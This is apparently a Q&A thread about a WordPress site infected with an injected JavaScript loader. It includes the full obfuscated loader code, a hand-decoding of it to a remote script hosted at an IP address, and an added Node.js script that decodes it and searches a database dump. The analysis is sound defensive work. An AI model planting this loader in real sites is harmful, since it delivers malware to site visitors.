
Yesterday I got a report asking us to check a WordPress website because the person's antivirus had blocked said site.

I ran the Sucuri Site Check and it indeed detects malware:

"Known javascript malware: malware.injection?39"

<!--codes_iframe--><script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script><!--/codes_iframe-->

I took the site offline and downloaded all the source code. But when I try to look for the malicious code... I can't find anything. I searched all the files and can't detect anything.

What can I do? Any help would be appreciated.

Sephy

1 Answer


The malware in question is hosted elsewhere, and is (probably) being added by cross-site scripting (XSS). If you have a look at the "var src" part, you'll see a long string of Base64-encoded text:

ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=

When decoded, that turns out to be the following:

document.write(unescape('%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%31%39%33%2E%32%33%38%2E%34%36%2E%35%37%2F%6D%52%50%50%7A%43%22%3E%3C%2F%73%63%72%69%70%74%3E'));

document.write adds the specified code into the DOM. URL-decoding the part inside "unescape" results in the following script tag (spaces added to break it):

<script src="http://193.238.46.57/            mRPPzC"></script>

So, the malware is likely hosted at THAT URL (whatever it is), and is being injected into the page via the document.write command.


A quick guide to how I did this

  1. Install Notepad++.
  2. Make sure the Mime tools plugin is installed (might be by default?)
  3. Copy the Base64-encoded string into a new file, and select the text.
  4. Under "Plugins", select "MIME Tools" --> Base 64 Decode
  5. Copy and paste the part inside unescape onto a new line
  6. Select the new line and then select "Plugins" --> MIME Tools --> URL Decode
Philip Rowlands

  • Thank you. I've found it was injected into my database. – Sephy May 30 '19 at 10:39
  • VirusTotal detects this URL as malicious, https://www.virustotal.com/#/url/9a1455877f76515dbd1f7196206b98a93742c34e4f5145dec9431d2221d00172/detection – marsnebulasoup May 30 '19 at 22:23
  • You could just use the `atob()` function in browser devtools, and then just run the `unescape()` in devtools (both are generally considered safe functions, barring major browser vulns) (without the `document.write`!). Or use an online base64 decoder. – Bob May 31 '19 at 02:50
  • @Bob they didn't occur to me - I'll keep them in mind. – Philip Rowlands May 31 '19 at 08:12
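As an added example (not code from the question, the answer, or any of the commenters), the Node.js script below performs the answer's two decoding steps statically, the Base64 layer and then the percent-encoded layer, without ever evaluating the payload, and then searches a database dump for the same loader, which is where Sephy's follow-up comment says it was actually found. The `INJECTED` constant is a copy of the snippet quoted in the question; the mysqldump excerpt, its table layout and the `example.test` hostname are constructed for illustration and are not from the original site.

```javascript
// Added example, not code from the question or the answer: unwrap the
// "codes_iframe" loader statically (the same Base64 and percent-decoding
// steps the answer does by hand) and then search a database dump for it.
// Nothing here evaluates the payload; it is string decoding only.

// Copy of the snippet quoted in the question. String.raw keeps the loader's
// own backslashes (\/ and \\$1) exactly as they sit in the page source.
const INJECTED = String.raw`<!--codes_iframe--><script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script><!--/codes_iframe-->`;

// Layer 1: the loader carries its payload in a base64 data: URI.
function extractDataUri(snippet) {
  const m = /data:text\/javascript;base64,([A-Za-z0-9+/=]+)/.exec(snippet);
  if (!m) throw new Error('no base64 data: URI in snippet');
  return m[1];
}

// Layer 2: the decoded payload is document.write(unescape('%XX...')).
function extractUnescapeArg(js) {
  const m = /unescape\(\s*'([^']*)'\s*\)/.exec(js);
  if (!m) throw new Error('no unescape(...) call in decoded payload');
  return m[1];
}

// Mirror unescape() itself (%XX and %uXXXX, one char each) rather than using
// decodeURIComponent, which rejects %uXXXX and treats %XX runs as UTF-8.
function unescapeLike(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (_, u, x) => String.fromCharCode(parseInt(u !== undefined ? u : x, 16)));
}

function extractScriptSrc(html) {
  const m = /<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["']/i.exec(html);
  return m ? m[1] : null;
}

// The loader gates itself on a cookie: it stores a timestamp 86400 s ahead
// and skips the document.write until that time has passed. Pull the cookie
// name and interval so it is clear why a browser that already holds the
// cookie can show a clean page while a cookie-less scanner sees the payload.
function describeGating(snippet) {
  const name = /getCookie\("([^"]+)"\)/.exec(snippet);
  const secs = /Date\.now\(\)\/1e3\+(\d+)\)/.exec(snippet);
  return { cookie: name ? name[1] : null, rearmSeconds: secs ? Number(secs[1]) : null };
}

function decodeInjection(snippet) {
  const base64 = extractDataUri(snippet);
  const stage1 = Buffer.from(base64, 'base64').toString('utf8');
  const stage2 = unescapeLike(extractUnescapeArg(stage1));
  return { base64, stage1, stage2, remoteScript: extractScriptSrc(stage2), gating: describeGating(snippet) };
}

// Constructed mysqldump-style excerpt (table layout simplified): the loader
// sits in post_content of wp_posts, which a grep over the PHP files never
// sees. mysqldump writes quotes as \" and \' and the loader's own \/ as \\/,
// so a search for the literal snippet can fail; search for tokens that
// survive that escaping: the marker comment and the data: URI prefix.
const DUMP = [
  "INSERT INTO `wp_options` VALUES (1,'siteurl','http://example.test','yes');",
  "INSERT INTO `wp_posts` VALUES (12,1,'2019-05-29 10:00:00','<p>Hello world</p>" +
    INJECTED.replace(/\\/g, '\\\\').replace(/"/g, '\\"').replace(/'/g, "\\'") +
    "','Hello world','publish');",
  "INSERT INTO `wp_posts` VALUES (13,1,'2019-05-29 11:00:00','<p>Clean post</p>','Clean','publish');",
].join('\n');

function findInjectedRows(dump) {
  const hits = [];
  dump.split('\n').forEach((line, i) => {
    const marker = /<!--codes_iframe-->/.test(line);
    const uri = /data:text\/javascript;base64,([A-Za-z0-9+/=]+)/.exec(line);
    if (!marker && !uri) return;
    const table = /INSERT INTO `([^`]+)`/.exec(line);
    hits.push({ lineNo: i + 1, table: table ? table[1] : null, base64: uri ? uri[1] : null });
  });
  return hits;
}

function report() {
  const r = decodeInjection(INJECTED);
  return { remoteScript: r.remoteScript, gating: r.gating, dbHits: findInjectedRows(DUMP) };
}

console.log(JSON.stringify(report(), null, 2));
```

Run it with `node decode.js`; `remoteScript` comes out as the same `http://193.238.46.57/mRPPzC` the answer arrives at by hand, and the dump scan reports the wp_posts row. Two details worth keeping in mind when reading the loader: the timestamp it stores is 86400 seconds ahead, but the cookie's `expires` value is computed from `getTime()+86400`, which is milliseconds, so the cookie actually lapses after roughly 86 seconds and the payload re-arms far sooner than the 24 hours the author presumably intended; and because a scanner like Sucuri sends no cookies, it sees the `document.write` on every fetch, which is why it flagged the site while a browser that had just visited might not have.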